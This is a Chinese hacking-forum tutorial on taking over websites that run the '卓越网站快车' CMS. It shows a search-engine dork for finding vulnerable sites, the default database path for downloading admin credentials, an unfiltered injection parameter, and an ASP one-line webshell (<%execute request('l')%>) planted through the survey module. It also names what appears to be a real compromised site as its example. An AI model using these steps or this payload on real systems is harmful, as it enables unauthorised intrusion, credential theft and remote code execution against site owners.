大家好,我是tookey,好久不见了
事情终于忙完了,可以暂时喘口气了,今天我给大家带来的是 如何获得卓越网站快车的webshell
最新版本的网站快车已经不存在上传漏洞了
我发现了一个注射点 http://127.0.0.1/zhuoyue/tab_disp.asp?MENUID=2231&TAB=网上商城&ID=10 ,这个id参数没有过滤,
但是这个系统存在多个数据库,文章数据放在newdata.mdb,用户数据放在userdata.mdb,所以就算存在注射点也不能读出admin的帐号和密码
也可能有人会说,可以利用acess跨库查询啊,但是要知道,acess跨库查询的前提是要知道数据库的位置,既然知道了数据库的路径,我们直接下载数据库就可以了,不必要去跨库查询了
好了,说了一些原理,我们现在就利用默认数据库来入侵吧!
搜索关键字:inurl:xxlr1.asp?ID=
默认数据库地址是 /database/userdata.mdb
我已经下载 好了
进了后台
现在演示如何获得webshell
在这里插入一句话木马 <%execute request("l")%>
已经把它写如了 调查的数据库
地址是 dc/webdc.asp
http://www.0315zf.cn/wx/dc/webdc.asp
有点慢啊
应该是写进去了
我连接一下
成功了
结束
如果有什么疑问,请到论坛交流 http://wm5.net.cn
我的id是无心人 |
设为首页
加入收藏
发布作品
栏目导航
又一招利用默认拿webshell
